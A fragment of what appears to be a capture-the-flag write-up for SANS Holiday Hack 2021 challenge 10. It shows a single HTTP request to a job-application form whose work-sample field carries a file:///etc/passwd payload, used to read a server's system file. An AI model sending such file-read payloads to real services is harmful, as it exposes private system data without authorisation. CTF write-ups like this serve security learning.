damaratix/sans-holiday-hack-2021/sources/challenge10.md

 GET /?inputName=aa&inputEmail=aa%40me.it&inputPhone=aa&inputField=Bedtime+violation&resumeFile=&inputWorkSample=file:///etc/passwd&additionalInformation=bbb&submit= HTTP/2
 Host: apply.jackfrosttower.com
 User-Agent: This field can be used like the "Evil Bit" 2.0.
 Absolutely NOT malicious!
-User-Agent: This field can be used like the "Evil Bit" 2.0
 ```

 <br>